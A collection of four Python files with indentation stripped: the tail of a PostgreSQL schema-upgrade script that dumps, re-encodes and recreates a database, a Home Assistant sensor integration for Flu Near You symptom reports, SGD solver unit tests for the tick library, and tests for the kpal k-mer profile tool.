print("Stauts: DB_VERSION_PREVIOUS in config file (%s) does not" \
" match current db version %d" % (upgrade_config_file, rows[0][0]))
sys.exit()
else:
print("STATUS: attempting upgrade from %d to %d" % \
(db_version_previous, db_version_new))
# check db encoding
sql = " SELECT pg_catalog.pg_encoding_to_char(d.encoding)" \
" FROM pg_catalog.pg_database d " \
" WHERE d.datname = '%s' " % config['PLC_DB_NAME']
cursor.execute(sql)
rows = cursor.fetchall()
if rows[0][0] not in ['UTF8', 'UNICODE']:
print("WARNING: db encoding is not utf8. Attempting to encode")
db.close()
# generate db dump
dump_file = '%s/dump.sql' % (temp_dir)
dump_file_encoded = dump_file + ".utf8"
dump_cmd = 'pg_dump -i %s -U postgres -f %s > /dev/null 2>&1' % \
(config['PLC_DB_NAME'], dump_file)
if os.system(dump_cmd):
print("ERROR: during db dump. Exiting.")
sys.exit(1)
# encode dump to utf8
print("Status: encoding database dump")
encode_utf8(dump_file, dump_file_encoded)
# archive original db
archive_db(config['PLC_DB_NAME'], config['PLC_DB_NAME']+'_sqlascii_archived')
# create a utf8 database and upload encoded data
recreate_cmd = 'createdb -U postgres -E UTF8 %s > /dev/null; ' \
'psql -a -U %s %s < %s > /dev/null 2>&1;' % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'], \
config['PLC_DB_NAME'], dump_file_encoded)
print("Status: recreating database as utf8")
if os.system(recreate_cmd):
print("Error: database encoding failed. Aborting")
sys.exit(1)
os.remove(dump_file_encoded)
os.remove(dump_file)
except:
raise
db = connect()
cursor = db.cursor()
# parse the schema user wishes to upgrade to
try:
file = open(schema_file, 'r')
index = 0
lines = file.readlines()
while index < len(lines):
line = lines[index]
if line.find("--") > -1:
line_parts = line.split("--")
line = line_parts[0]
# find all created objects
if line.startswith("CREATE"):
line_parts = line.split(" ")
if line_parts[1:3] == ['OR', 'REPLACE']:
line_parts = line_parts[2:]
item_type = line_parts[1]
item_name = line_parts[2]
schema_items_ordered.append(item_name)
if item_type in ['INDEX']:
schema[item_name] = (item_type, line)
# functions, tables, views span over multiple lines
# handle differently than indexes
elif item_type in ['AGGREGATE', 'TABLE', 'VIEW']:
fields = [line]
while index < len(lines):
index = index + 1
nextline =lines[index]
if nextline.find("--") > -1:
new_line_parts = nextline.split("--")
nextline = new_line_parts[0]
# look for any sequences
if item_type in ['TABLE'] and nextline.find('serial') > -1:
sequences[item_name] = nextline.strip().split()[0]
fields.append(nextline)
if nextline.find(";") >= 0:
break
schema[item_name] = (item_type, fields)
else:
print("Error: unknown type %s" % item_type)
elif line.startswith("INSERT"):
inserts.append(line)
index = index + 1
except:
raise
print("Status: generating temp tables")
# generate all temp tables
for key in schema_items_ordered:
(type, body_list) = schema[key]
if type == 'TABLE':
generate_temp_table(key, db)
# disconnect from current database and archive it
cursor.close()
db.close()
print("Status: archiving database")
archive_db(config['PLC_DB_NAME'], config['PLC_DB_NAME']+'_archived')
os.system('createdb -U postgres -E UTF8 %s > /dev/null; ' % config['PLC_DB_NAME'])
print("Status: upgrading database")
# attempt to create and load all items from schema into temp db
try:
for key in schema_items_ordered:
(type, body_list) = schema[key]
create_item_from_schema(key)
if type == 'TABLE':
if key in upgrade_config:
# attempt to populate with temp table data
table_def = upgrade_config[key].replace('(', '').replace(')', '').split(',')
table_fields = [field.strip().split(':')[0] for field in table_def]
insert_cmd = "psql %s %s -c " \
" 'COPY %s (%s) FROM stdin;' < %s " % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'], key,
", ".join(table_fields), temp_tables[key] )
exit_status = os.system(insert_cmd)
if exit_status:
print("Error: upgrade %s failed" % key)
sys.exit(1)
# update the primary key sequence
if key in sequences:
sequence = key +"_"+ sequences[key] +"_seq"
update_seq = "psql %s %s -c " \
" \"select setval('%s', max(%s)) FROM %s;\" > /dev/null" % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'], sequence,
sequences[key], key)
exit_status = os.system(update_seq)
if exit_status:
print("Error: sequence %s update failed" % sequence)
sys.exit(1)
else:
# check if there are any insert stmts in schema for this table
print("Warning: %s has no temp data file. Unable to populate with old data" % key)
for insert_stmt in inserts:
if insert_stmt.find(key) > -1:
insert_cmd = 'psql %s postgres -qc "%s;" > /dev/null 2>&1' % \
(config['PLC_DB_NAME'], insert_stmt)
os.system(insert_cmd)
except:
print("Error: failed to populate db. Unarchiving original database and aborting")
undo_command = "dropdb -U postgres %s > /dev/null; psql template1 postgres -qc" \
" 'ALTER DATABASE %s RENAME TO %s;'; > /dev/null" % \
(config['PLC_DB_NAME'], config['PLC_DB_NAME']+'_archived', config['PLC_DB_NAME'])
os.system(undo_command)
#remove_temp_tables()
raise
#remove_temp_tables()
print("upgrade complete")
| python |
"""Support for user- and CDC-based flu info sensors from Flu Near You."""
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_STATE,
CONF_LATITUDE,
CONF_LONGITUDE,
)
from homeassistant.core import callback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import CATEGORY_CDC_REPORT, CATEGORY_USER_REPORT, DATA_COORDINATOR, DOMAIN
ATTR_CITY = "city"
ATTR_REPORTED_DATE = "reported_date"
ATTR_REPORTED_LATITUDE = "reported_latitude"
ATTR_REPORTED_LONGITUDE = "reported_longitude"
ATTR_STATE_REPORTS_LAST_WEEK = "state_reports_last_week"
ATTR_STATE_REPORTS_THIS_WEEK = "state_reports_this_week"
ATTR_ZIP_CODE = "zip_code"
DEFAULT_ATTRIBUTION = "Data provided by Flu Near You"
SENSOR_TYPE_CDC_LEVEL = "level"
SENSOR_TYPE_CDC_LEVEL2 = "level2"
SENSOR_TYPE_USER_CHICK = "chick"
SENSOR_TYPE_USER_DENGUE = "dengue"
SENSOR_TYPE_USER_FLU = "flu"
SENSOR_TYPE_USER_LEPTO = "lepto"
SENSOR_TYPE_USER_NO_SYMPTOMS = "none"
SENSOR_TYPE_USER_SYMPTOMS = "symptoms"
SENSOR_TYPE_USER_TOTAL = "total"
CDC_SENSORS = [
(SENSOR_TYPE_CDC_LEVEL, "CDC Level", "mdi:biohazard", None),
(SENSOR_TYPE_CDC_LEVEL2, "CDC Level 2", "mdi:biohazard", None),
]
USER_SENSORS = [
(SENSOR_TYPE_USER_CHICK, "Avian Flu Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_DENGUE, "Dengue Fever Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_FLU, "Flu Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_LEPTO, "Leptospirosis Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_NO_SYMPTOMS, "No Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_SYMPTOMS, "Flu-like Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_TOTAL, "Total Symptoms", "mdi:alert", "reports"),
]
EXTENDED_SENSOR_TYPE_MAPPING = {
SENSOR_TYPE_USER_FLU: "ili",
SENSOR_TYPE_USER_NO_SYMPTOMS: "no_symptoms",
SENSOR_TYPE_USER_TOTAL: "total_surveys",
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up Flu Near You sensors based on a config entry."""
coordinators = hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id]
sensors = []
for (sensor_type, name, icon, unit) in CDC_SENSORS:
sensors.append(
CdcSensor(
coordinators[CATEGORY_CDC_REPORT],
config_entry,
sensor_type,
name,
icon,
unit,
)
)
for (sensor_type, name, icon, unit) in USER_SENSORS:
sensors.append(
UserSensor(
coordinators[CATEGORY_USER_REPORT],
config_entry,
sensor_type,
name,
icon,
unit,
)
)
async_add_entities(sensors)
class FluNearYouSensor(CoordinatorEntity):
"""Define a base Flu Near You sensor."""
def __init__(self, coordinator, config_entry, sensor_type, name, icon, unit):
"""Initialize the sensor."""
super().__init__(coordinator)
self._attrs = {ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION}
self._config_entry = config_entry
self._icon = icon
self._name = name
self._sensor_type = sensor_type
self._state = None
self._unit = unit
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
return self._attrs
@property
def icon(self):
"""Return the icon."""
return self._icon
@property
def name(self):
"""Return the name."""
return self._name
@property
def state(self):
"""Return the state."""
return self._state
@property
def unique_id(self):
"""Return a unique, Home Assistant friendly identifier for this entity."""
return (
f"{self._config_entry.data[CONF_LATITUDE]},"
f"{self._config_entry.data[CONF_LONGITUDE]}_{self._sensor_type}"
)
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return self._unit
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
self.update_from_latest_data()
self.async_write_ha_state()
async def async_added_to_hass(self):
"""Register callbacks."""
await super().async_added_to_hass()
self.update_from_latest_data()
@callback
def update_from_latest_data(self):
"""Update the sensor."""
raise NotImplementedError
class CdcSensor(FluNearYouSensor):
"""Define a sensor for CDC reports."""
@callback
def update_from_latest_data(self):
"""Update the sensor."""
self._attrs.update(
{
ATTR_REPORTED_DATE: self.coordinator.data["week_date"],
ATTR_STATE: self.coordinator.data["name"],
}
)
self._state = self.coordinator.data[self._sensor_type]
class UserSensor(FluNearYouSensor):
"""Define a sensor for user reports."""
@callback
def update_from_latest_data(self):
"""Update the sensor."""
self._attrs.update(
{
ATTR_CITY: self.coordinator.data["local"]["city"].split("(")[0],
ATTR_REPORTED_LATITUDE: self.coordinator.data["local"]["latitude"],
ATTR_REPORTED_LONGITUDE: self.coordinator.data["local"]["longitude"],
ATTR_STATE: self.coordinator.data["state"]["name"],
ATTR_ZIP_CODE: self.coordinator.data["local"]["zip"],
}
)
if self._sensor_type in self.coordinator.data["state"]["data"]:
states_key = self._sensor_type
elif self._sensor_type in EXTENDED_SENSOR_TYPE_MAPPING:
states_key = EXTENDED_SENSOR_TYPE_MAPPING[self._sensor_type]
self._attrs[ATTR_STATE_REPORTS_THIS_WEEK] = self.coordinator.data["state"][
"data"
][states_key]
self._attrs[ATTR_STATE_REPORTS_LAST_WEEK] = self.coordinator.data["state"][
"last_week_data"
][states_key]
if self._sensor_type == SENSOR_TYPE_USER_TOTAL:
self._state = sum(
v
for k, v in self.coordinator.data["local"].items()
if k
in (
SENSOR_TYPE_USER_CHICK,
SENSOR_TYPE_USER_DENGUE,
SENSOR_TYPE_USER_FLU,
SENSOR_TYPE_USER_LEPTO,
SENSOR_TYPE_USER_SYMPTOMS,
)
)
else:
self._state = self.coordinator.data["local"][self._sensor_type]
| python |
# License: BSD 3 clause
import unittest
from tick.solver import SGD
from tick.solver.tests import TestSolver
class SGDTest(object):
def test_solver_sgd(self):
"""...Check SGD solver for Logistic Regression with Ridge
penalization
"""
solver = SGD(max_iter=100, verbose=False, seed=TestSolver.sto_seed,
step=200)
self.check_solver(solver, fit_intercept=True, model="logreg",
decimal=0)
def test_sgd_sparse_and_dense_consistency(self):
"""...SGDTest SGD can run all glm models and is consistent with sparsity
"""
def create_solver():
return SGD(max_iter=1, verbose=False, step=1e-5,
seed=TestSolver.sto_seed)
self._test_solver_sparse_and_dense_consistency(create_solver)
def test_sgd_dtype_can_change(self):
"""...Test sgd astype method
"""
def create_solver():
return SGD(max_iter=100, verbose=False, step=1e-1,
seed=TestSolver.sto_seed)
self._test_solver_astype_consistency(create_solver)
class SGDTestFloat32(TestSolver, SGDTest):
def __init__(self, *args, **kwargs):
TestSolver.__init__(self, *args, dtype="float32", **kwargs)
class SGDTestFloat64(TestSolver, SGDTest):
def __init__(self, *args, **kwargs):
TestSolver.__init__(self, *args, dtype="float64", **kwargs)
if __name__ == '__main__':
unittest.main()
| python |
"""
Tests for the `kpal.kmer` module.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future import standard_library
from future.builtins import str, zip
import itertools
from io import open, StringIO
from Bio import Seq
import numpy as np
from kpal import kmer
import utils
with standard_library.hooks():
from collections import Counter
class TestKmer(utils.TestEnvironment):
def test_main_info(self, capsys):
# For the `capsys` fixture, see:
# http://pytest.org/latest/capture.html
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.profile(counts, 8, 'a')
kmer.main(['info', filename])
out, err = capsys.readouterr()
expected = 'File format version: 1.0.0\n'
expected += 'Produced by: kMer unit tests\n\n'
expected += 'Profile: a\n'
expected += '- k-mer length: 8 (%d k-mers)\n' % (4**8)
expected += '- Zero counts: %i\n' % (4**8 - len(counts))
expected += '- Non-zero counts: %i\n' % len(counts)
expected += '- Sum of counts: %i\n' % sum(counts.values())
expected += '- Mean of counts: %.3f\n' % np.mean([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Median of counts: %.3f\n' % np.median([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Standard deviation of counts: %.3f\n' % np.std([0] * (4**8 - len(counts)) + list(counts.values()))
assert out == expected
def test_convert(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with open(self.profile_old_format(counts, 8)) as handle:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.convert([handle], profile_handle)
utils.test_profile_file(filename, counts, 8)
def test_cat(self):
counts_a = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_b = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_a, 8, name='a')) as handle_a:
with utils.open_profile(self.profile(counts_b, 8, name='b')) as handle_b:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.cat([handle_a, handle_b], profile_handle)
utils.test_profile_file(filename, counts_a, 8, name='a')
utils.test_profile_file(filename, counts_b, 8, name='b')
def test_cat_prefixes(self):
counts_a = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_b = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_a, 8, name='X')) as handle_a:
with utils.open_profile(self.profile(counts_b, 8, name='X')) as handle_b:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.cat([handle_a, handle_b], profile_handle, prefixes=['a_', 'b_'])
utils.test_profile_file(filename, counts_a, 8, name='a_X')
utils.test_profile_file(filename, counts_b, 8, name='b_X')
def test_count(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with open(self.fasta(utils.SEQUENCES)) as fasta_handle:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([fasta_handle], profile_handle, 8)
utils.test_profile_file(filename, counts, 8)
def test_count_multi(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with open(self.fasta(utils.SEQUENCES_LEFT)) as handle_left:
with open(self.fasta(utils.SEQUENCES_RIGHT)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([handle_left, handle_right], profile_handle, 8, names=['a', 'b'])
utils.test_profile_file(filename, counts_left, 8, name='a')
utils.test_profile_file(filename, counts_right, 8, name='b')
def test_count_by_record(self):
counts_by_record = [utils.counts(record, 8) for record in utils.SEQUENCES]
names = [str(i) for i, _ in enumerate(counts_by_record)]
filename = self.empty()
with open(self.fasta(utils.SEQUENCES, names=names)) as fasta_handle:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([fasta_handle], profile_handle, 8, by_record=True)
for name, counts in zip(names, counts_by_record):
utils.test_profile_file(filename, counts, 8, name=name)
def test_count_multi_by_record(self):
counts_by_record_left = [utils.counts(record, 8) for record in utils.SEQUENCES_LEFT]
counts_by_record_right = [utils.counts(record, 8) for record in utils.SEQUENCES_RIGHT]
names_left = [str(i) for i, _ in enumerate(counts_by_record_left)]
names_right = [str(i) for i, _ in enumerate(counts_by_record_right)]
filename = self.empty()
with open(self.fasta(utils.SEQUENCES_LEFT, names=names_left)) as handle_left:
with open(self.fasta(utils.SEQUENCES_RIGHT, names=names_right)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([handle_left, handle_right], profile_handle, 8, names=['a', 'b'], by_record=True)
for name, counts in zip(names_left, counts_by_record_left):
utils.test_profile_file(filename, counts, 8, name='a_' + name)
for name, counts in zip(names_right, counts_by_record_right):
utils.test_profile_file(filename, counts, 8, name='b_' + name)
def test_merge(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle)
utils.test_profile_file(filename, counts_left + counts_right, 8)
def test_merge_xor(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle, merger='xor')
counts_xor = counts_left + counts_right
for s in set(counts_left) & set(counts_right):
del counts_xor[s]
utils.test_profile_file(filename, counts_xor, 8)
def test_merge_custom_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle, custom_merger='(left + right) * np.logical_xor(left, right)')
counts_xor = counts_left + counts_right
for s in set(counts_left) & set(counts_right):
del counts_xor[s]
utils.test_profile_file(filename, counts_xor, 8)
def test_merge_custom_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle, custom_merger='numpy.multiply')
counts_mult = Counter(dict((s, counts_left[s] * counts_right[s])
for s in set(counts_left) & set(counts_right)))
utils.test_profile_file(filename, counts_mult, 8)
def test_balance(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
with utils.open_profile(filename, 'w') as output_handle:
kmer.balance(input_handle, output_handle)
counts.update(dict((utils.reverse_complement(s), c) for s, c in counts.items()))
utils.test_profile_file(filename, counts, 8)
def test_get_balance(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
kmer.get_balance(input_handle, out, precision=3)
assert out.getvalue() == '1 0.669\n'
def test_get_stats(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
kmer.get_stats(input_handle, out)
name, mean, std = out.getvalue().strip().split()
assert name == '1'
assert mean == '%.10f' % np.mean(utils.as_array(counts, 8))
assert std == '%.10f' % np.std(utils.as_array(counts, 8))
def test_distribution(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
kmer.distribution(input_handle, out)
counter = Counter(utils.as_array(counts, 8))
assert out.getvalue() == '\n'.join('1 %i %i' % x
for x in sorted(counter.items())) + '\n'
def test_info(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8, 'a')) as input_handle:
kmer.info(input_handle, out)
expected = 'File format version: 1.0.0\n'
expected += 'Produced by: kMer unit tests\n\n'
expected += 'Profile: a\n'
expected += '- k-mer length: 8 (%d k-mers)\n' % (4**8)
expected += '- Zero counts: %i\n' % (4**8 - len(counts))
expected += '- Non-zero counts: %i\n' % len(counts)
expected += '- Sum of counts: %i\n' % sum(counts.values())
expected += '- Mean of counts: %.3f\n' % np.mean([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Median of counts: %.3f\n' % np.median([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Standard deviation of counts: %.3f\n' % np.std([0] * (4**8 - len(counts)) + list(counts.values()))
assert out.getvalue() == expected
def test_get_count(self):
counts = utils.counts(utils.SEQUENCES, 8)
word, count = counts.most_common(1)[0]
out = StringIO()
with utils.open_profile(self.profile(counts, 8, 'a')) as input_handle:
kmer.get_count(input_handle, out, word)
assert out.getvalue() == 'a %d\n' % count
def test_positive(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.positive(handle_left, handle_right, out_left, out_right)
utils.test_profile_file(filename_left, Counter(s for s in counts_left.elements()
if s in counts_right), 8)
utils.test_profile_file(filename_right, Counter(s for s in counts_right.elements()
if s in counts_left), 8)
def test_scale(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.scale(handle_left, handle_right, out_left, out_right)
if sum(counts_left.values()) < sum(counts_right.values()):
scale_left = sum(counts_right.values()) / sum(counts_left.values())
scale_right = 1.0
else:
scale_left = 1.0
scale_right = sum(counts_left.values()) / sum(counts_right.values())
for s in counts_left:
counts_left[s] *= scale_left
for s in counts_right:
counts_right[s] *= scale_right
utils.test_profile_file(filename_left, counts_left, 8)
utils.test_profile_file(filename_right, counts_right, 8)
def test_shrink(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
with utils.open_profile(filename, 'w') as output_handle:
kmer.shrink(input_handle, output_handle, 1)
counts = Counter(dict((t, sum(counts[u] for u in counts
if u.startswith(t)))
for t in set(s[:-1] for s in counts)))
utils.test_profile_file(filename, counts, 7)
def test_shuffle(self):
# See test_klib.profile_shuffle
counts = utils.counts(utils.SEQUENCES, 2)
filename = self.empty()
with utils.open_profile(self.profile(counts, 2)) as input_handle:
with utils.open_profile(filename, 'w') as output_handle:
np.random.seed(100)
kmer.shuffle(input_handle, output_handle)
counts = dict(zip([''.join(s) for s in itertools.product('ACGT', repeat=2)],
[13, 7, 6, 18, 12, 1, 13, 17, 16, 12, 23, 27, 24, 17, 18, 12]))
utils.test_profile_file(filename, counts, 2)
def test_smooth(self):
# See test_kdistlib.test_ProfileDistance_dynamic_smooth
counts_left = Counter(['AC', 'AG', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TG', 'TT'])
counts_right = Counter(['AC', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TC', 'TG', 'TT'])
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 2)) as handle_left:
with utils.open_profile(self.profile(counts_right, 2)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.smooth(handle_left, handle_right, out_left, out_right, summary='min')
counts_left = Counter(['AA', 'AA', 'AA', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TA', 'TA'])
counts_right = Counter(['AA', 'AA', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TA', 'TA', 'TA'])
utils.test_profile_file(filename_left, counts_left, 2)
utils.test_profile_file(filename_right, counts_right, 2)
def test_smooth_custom_expr(self):
# See test_kdistlib.test_ProfileDistance_dynamic_smooth
counts_left = Counter(['AC', 'AG', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TG', 'TT'])
counts_right = Counter(['AC', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TC', 'TG', 'TT'])
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 2)) as handle_left:
with utils.open_profile(self.profile(counts_right, 2)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.smooth(handle_left, handle_right, out_left, out_right, custom_summary='np.max(values)')
def test_smooth_custom_name(self):
# See test_kdistlib.test_ProfileDistance_dynamic_smooth
counts_left = Counter(['AC', 'AG', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TG', 'TT'])
counts_right = Counter(['AC', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TC', 'TG', 'TT'])
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 2)) as handle_left:
with utils.open_profile(self.profile(counts_right, 2)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.smooth(handle_left, handle_right, out_left, out_right, custom_summary='numpy.max')
def test_distance(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out)
assert out.getvalue() == 'left right %.10f\n' % 0.4626209323
def test_distance_smooth(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True, precision=3)
assert out.getvalue() == 'left right 0.077\n'
def test_distance_smooth_average(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True,
precision=3, summary='average')
assert out.getvalue() == 'left right 0.474\n'
def test_distance_smooth_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True,
precision=3, custom_summary='np.max(values)')
assert out.getvalue() == 'left right 0.474\n'
def test_distance_smooth_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True,
precision=3, custom_summary='numpy.max')
assert out.getvalue() == 'left right 0.474\n'
def test_distance_pairwise_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, precision=3,
custom_pairwise='abs(left - right) / (left + right + 1000)')
assert out.getvalue() == 'left right 0.001\n'
def test_distance_pairwise_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, precision=3,
custom_pairwise='numpy.multiply')
assert out.getvalue() == 'left right 0.084\n'
def test_distance_matrix(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, precision=3)
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.463', '0.000 0.463']
def test_distance_matrix_smooth(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True, precision=3)
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.077', '0.000 0.077']
def test_distance_matrix_smooth_average(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True,
summary='average', precision=3)
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.474', '0.000 0.474']
